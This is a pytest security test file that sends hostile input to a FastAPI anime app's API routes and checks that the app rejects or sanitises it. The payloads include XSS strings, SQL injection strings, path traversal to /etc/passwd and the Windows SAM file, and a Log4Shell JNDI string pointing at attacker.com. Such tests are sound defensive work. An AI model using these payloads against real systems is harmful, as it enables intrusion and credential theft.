Aniworld/tests/security/test_input_validation.py
2025-10-30 20:06:45 +01:00

325 lines
11 KiB
Python

"""
Input Validation Security Tests.
This module tests input validation across the application to ensure
all user inputs are properly sanitized and validated.
"""
import pytest
from httpx import AsyncClient
from src.server.fastapi_app import app
@pytest.mark.security
class TestInputValidation:
    """Security tests for input validation.

    Every test sends hostile or malformed input to an API route through an
    in-process ASGI client and checks the response status code and, where
    the request is accepted, the data echoed back.
    """

    @pytest.fixture
    async def client(self):
        """Yield an ``AsyncClient`` wired to ``app`` via ``ASGITransport``."""
        from httpx import ASGITransport

        async with AsyncClient(
            transport=ASGITransport(app=app), base_url="http://test"
        ) as ac:
            yield ac

    @pytest.mark.asyncio
    async def test_xss_in_anime_title(self, client):
        """Test XSS protection in anime title input."""
        xss_payloads = [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "javascript:alert('XSS')",
            "<svg onload=alert('XSS')>",
        ]
        # One marker per payload family above; "onload" covers the <svg>
        # payload, which previously went unchecked.
        forbidden_markers = ("<script>", "onerror", "onload", "javascript:")

        for payload in xss_payloads:
            response = await client.post(
                "/api/anime",
                json={"title": payload, "description": "Test"},
            )
            # Should either reject or sanitize. Only the accepted (200)
            # case is inspected; other status codes are not asserted on.
            if response.status_code == 200:
                data = response.json()
                title = data.get("data", {}).get("title", "").lower()
                for marker in forbidden_markers:
                    assert marker not in title, (
                        f"Unsanitized marker {marker!r} returned "
                        f"for payload {payload!r}"
                    )

    @pytest.mark.asyncio
    async def test_oversized_input(self, client):
        """Test handling of extremely large inputs."""
        # One million characters (~1 MB) in a single field.
        huge_string = "A" * 1_000_000
        response = await client.post(
            "/api/anime",
            json={"title": huge_string, "description": "Test"},
        )
        # Only outright rejection is accepted; an accepted (200) response,
        # even with a truncated title, fails this test.
        assert response.status_code in [400, 413, 422]

    @pytest.mark.asyncio
    async def test_null_byte_injection(self, client):
        """Test null byte injection protection."""
        null_byte_payloads = [
            "filename.txt\x00.exe",
            "test\x00admin",
            "user\x00' OR '1'='1",
        ]
        for payload in null_byte_payloads:
            response = await client.post(
                "/api/anime/search",
                params={"query": payload},
            )
            # Should handle safely: a normal answer or a validation error,
            # never an unexpected status such as a server error.
            assert response.status_code in [200, 400, 422], (
                f"Unexpected status {response.status_code} "
                f"for payload {payload!r}"
            )

    @pytest.mark.asyncio
    async def test_unicode_bypass_attempts(self, client):
        """Test handling of unicode bypass attempts."""
        unicode_payloads = [
            "admin\u202e",  # Right-to-left override
            "\ufeffadmin",  # Zero-width no-break space
            "ad\u200bmin",  # Zero-width space
        ]
        for payload in unicode_payloads:
            response = await client.post(
                "/api/auth/login",
                json={"username": payload, "password": "test"},
            )
            # Should not bypass security
            assert response.status_code in [401, 422], (
                f"Unexpected status {response.status_code} "
                f"for username {payload!r}"
            )

    @pytest.mark.asyncio
    async def test_path_traversal_in_file_access(self, client):
        """Test path traversal protection."""
        traversal_payloads = [
            "../../../etc/passwd",
            "..\\..\\..\\windows\\system32\\config\\sam",
            "....//....//....//etc/passwd",
            "..%2F..%2F..%2Fetc%2Fpasswd",
        ]
        for payload in traversal_payloads:
            response = await client.get(f"/static/{payload}")
            # Should not access sensitive files
            # App returns error page (200) or proper error code
            if response.status_code == 200:
                # Verify it's an error page, not the actual file
                content = response.text.lower()
                assert (
                    "error" in content
                    or "not found" in content
                    or "<!doctype html>" in content
                ), "Response should be error page, not sensitive file"
                # The check above passes for any body containing "error",
                # so also rule out a served passwd file explicitly.
                assert "root:x:0:0" not in content, (
                    f"passwd content leaked for payload {payload!r}"
                )
            else:
                assert response.status_code in [400, 403, 404], (
                    f"Unexpected status {response.status_code} "
                    f"for payload {payload!r}"
                )

    @pytest.mark.asyncio
    async def test_negative_numbers_where_positive_expected(
        self, client
    ):
        """Test handling of negative numbers in inappropriate contexts."""
        response = await client.post(
            "/api/downloads",
            json={
                "anime_id": -1,
                "episode_number": -5,
                "priority": -10,
            },
        )
        # Should reject negative values
        assert response.status_code in [400, 422]

    @pytest.mark.asyncio
    async def test_special_characters_in_username(self, client):
        """Test handling of special characters in usernames."""
        special_chars = [
            "user<script>",
            "user@#$%^&*()",
            "user\n\r\t",
            "user'OR'1'='1",
        ]
        for username in special_chars:
            response = await client.post(
                "/api/auth/register",
                json={
                    "username": username,
                    "password": "SecureP@ss123!",
                    "email": "test@example.com",
                },
            )
            # Should either reject or sanitize
            if response.status_code == 200:
                data = response.json()
                registered_username = data.get("data", {}).get(
                    "username", ""
                )
                assert "<script>" not in registered_username, (
                    f"Unsanitized username stored for input {username!r}"
                )

    @pytest.mark.asyncio
    async def test_email_validation(self, client):
        """Test email format validation."""
        invalid_emails = [
            "notanemail",
            "@example.com",
            "user@",
            "user space@example.com",
            "user@example",
        ]
        # Usernames come from the list index rather than hash(email):
        # str hashes are randomized per process and may be negative, which
        # made the request data non-deterministic and could add a "-" that
        # gets the request rejected for the username, not the email.
        for index, email in enumerate(invalid_emails):
            response = await client.post(
                "/api/auth/register",
                json={
                    "username": f"user_{index}",
                    "password": "SecureP@ss123!",
                    "email": email,
                },
            )
            # Should reject invalid emails
            assert response.status_code in [400, 422], (
                f"Invalid email {email!r} was not rejected "
                f"(status {response.status_code})"
            )

    @pytest.mark.asyncio
    async def test_array_injection(self, client):
        """Test handling of array inputs in unexpected places."""
        response = await client.post(
            "/api/anime",
            json={
                "title": ["array", "instead", "of", "string"],
                "description": "Test",
            },
        )
        # Only rejection is accepted for a list where a string is expected
        assert response.status_code in [400, 422]

    @pytest.mark.asyncio
    async def test_object_injection(self, client):
        """Test handling of object inputs in unexpected places."""
        response = await client.post(
            "/api/anime/search",
            params={"query": {"nested": "object"}},
        )
        # Should reject with proper error or handle gracefully
        # API converts objects to strings and searches for them (returns [])
        if response.status_code == 200:
            # Verify it handled it safely (returned empty or error)
            data = response.json()
            assert isinstance(data, list)
            # Should not have executed the object as code
            assert "nested" not in str(data).lower() or len(data) == 0
        else:
            assert response.status_code in [400, 422]
@pytest.mark.security
@pytest.mark.requires_clean_auth
class TestAPIParameterValidation:
    """Security tests for API parameter validation.

    Covers pagination values, injection strings in query parameters,
    missing required fields and unexpected extra fields.
    """

    @pytest.fixture
    async def client(self):
        """Yield an ``AsyncClient`` wired to ``app`` via ``ASGITransport``."""
        from httpx import ASGITransport

        async with AsyncClient(
            transport=ASGITransport(app=app), base_url="http://test"
        ) as ac:
            yield ac

    async def get_auth_token(self, client):
        """Set up a master password, log in and return the access token.

        Raises:
            AssertionError: if the login response carries no
                ``access_token``. The message includes the status code and
                body, so a failed setup or login is diagnosable instead of
                surfacing as a bare ``KeyError``.
        """
        password = "SecurePass123!"
        await client.post(
            "/api/auth/setup",
            json={"master_password": password}
        )
        login_response = await client.post(
            "/api/auth/login",
            json={"password": password}
        )
        payload = login_response.json()
        assert "access_token" in payload, (
            f"Login failed with status {login_response.status_code}: "
            f"{login_response.text}"
        )
        return payload["access_token"]

    @pytest.mark.asyncio
    async def test_invalid_pagination_parameters(self, client):
        """Test handling of invalid pagination parameters."""
        token = await self.get_auth_token(client)
        headers = {"Authorization": f"Bearer {token}"}
        invalid_params = [
            {"page": -1, "per_page": 10},
            {"page": 1, "per_page": -10},
            {"page": 999999999, "per_page": 999999999},
            {"page": "invalid", "per_page": "invalid"},
        ]
        for params in invalid_params:
            response = await client.get(
                "/api/anime", params=params, headers=headers
            )
            # Should reject or use defaults, or 503 when service unavailable
            assert response.status_code in [200, 400, 422, 503], (
                f"Unexpected status {response.status_code} "
                f"for params {params!r}"
            )

    @pytest.mark.asyncio
    async def test_injection_in_query_parameters(self, client):
        """Test injection protection in query parameters."""
        injection_queries = [
            "' OR '1'='1",
            "<script>alert('XSS')</script>",
            "${jndi:ldap://attacker.com/evil}",
            "{{7*7}}",
        ]
        for query in injection_queries:
            response = await client.get(
                "/api/anime/search", params={"query": query}
            )
            # Should handle safely
            assert response.status_code in [200, 400, 422], (
                f"Unexpected status {response.status_code} "
                f"for query {query!r}"
            )

    @pytest.mark.asyncio
    async def test_missing_required_parameters(self, client):
        """Test handling of missing required parameters."""
        response = await client.post("/api/auth/login", json={})
        # Should reject with appropriate error
        assert response.status_code == 422

    @pytest.mark.asyncio
    async def test_extra_unexpected_parameters(self, client):
        """Test handling of extra unexpected parameters."""
        response = await client.post(
            "/api/auth/login",
            json={
                "username": "testuser",
                "password": "test",
                "unexpected_field": "malicious_value",
                "is_admin": True,  # Attempt to elevate privileges
            },
        )
        # Should ignore extra params or reject
        if response.status_code == 200:
            # Should not grant admin from parameter
            data = response.json()
            # get_auth_token reads "access_token" from the top level of
            # the login response, so check there as well as under "data";
            # checking only the nested location could never fail.
            assert not data.get("is_admin", False)
            assert not data.get("data", {}).get("is_admin", False)